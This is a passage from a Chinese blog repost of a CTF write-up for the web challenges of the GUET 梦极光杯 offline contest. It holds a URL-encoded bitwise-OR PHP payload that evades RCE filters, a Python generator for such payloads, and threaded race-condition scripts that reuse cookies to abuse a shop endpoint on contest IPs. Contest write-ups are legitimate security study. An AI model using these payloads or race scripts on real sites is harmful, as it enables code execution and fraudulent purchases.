张士玉小黑屋

一个关注IT技术分享，关注互联网的网站，爱分享网络资源，分享学到的知识，分享生活的乐趣。

当前位置：首页 » 《随便一记》 » 正文

[CTF]GUET梦极光杯线下赛web部分WP_Sapphire037的博客

19 人参与 2022年05月18日 15:41 分类 : 《随便一记》评论

点击全文阅读

Cover with trick

请添加图片描述
双写绕过，变量覆盖

Construct Master

"%07%15%05%14%03%14%06"|"%60%60%60%60%60%60%60"

import urllib
from sys import *
import os


def action(arg):
	s1 = ""
	s2 = ""
	for i in arg:
		f = open("rce.txt", "r")
		while True:
			t = f.readline()
			if t == "":
				break
			if t[0] == i:
				# print(i)
				s1 += t[2:5]
				s2 += t[6:9]
				break
		f.close()
	output = "(\"" + s1 + "\"|\"" + s2 + "\")"
	return (output)
while True:
	param = action(input("\n[+] your function："))
	print(param)

rce.txt如何生成详情见我的文章

WEB Engineer

curl或者直接bp发包访问index.php

race on shop

草
条件竞争，一直购买,然后带着购买完的cookie去访问flag.php即可

import requests
import threading
url = "http://172.16.68.4:28013/?id=2"
url2 = "http://172.16.68.4:28013/flag.php"
cookie1 = {"PHPSESSID": "99c6b70d71e29eb6c11e9321c363393e", 'gold_card_id': 'afd3475b15b945e2efd00f66583c61c4'}

def bp(session):
    r = session.get(url, cookies=cookie1)
    if "成功" in r.text:
        print(r.text)
if __name__ == '__main__':
    session = requests.session()
    for i in range(0,50):
        threading.Thread(target=bp, args=(session,)).start()

或者

import requests
import threading

def get():
	url = "http://172.16.68.4:28045/?id=2"
	cookie1 = {'gold_card_id': 'afd3475b15b945e2efd00f66583c61c4'}
	r=requests.get(url,cookies=cookie1)
# def get1():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# def get2():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# def get3():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# def get4():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# if __name__ == '__main__':
# 	event=threading.Event()
# 	event.set()
# 	while True:
# 		for i in range(1,50):
# 			t=threading.Thread(target=get)
# 			t.start()
# 			t2=threading.Thread(target=get1)
# 			t.start()
# 			t3 = threading.Thread(target=get2)
# 			t.start()
# 			t4 = threading.Thread(target=get3)
# 			t.start()
# 			t5 = threading.Thread(target=get4)
# 			t.start()
if __name__ == '__main__':
	import gevent
	from gevent.pool import Pool
	from gevent import monkey
	monkey.patch_all()
	pool=Pool(100)
	for i in range(50):
		pool.spawn(get)

	gevent.wait()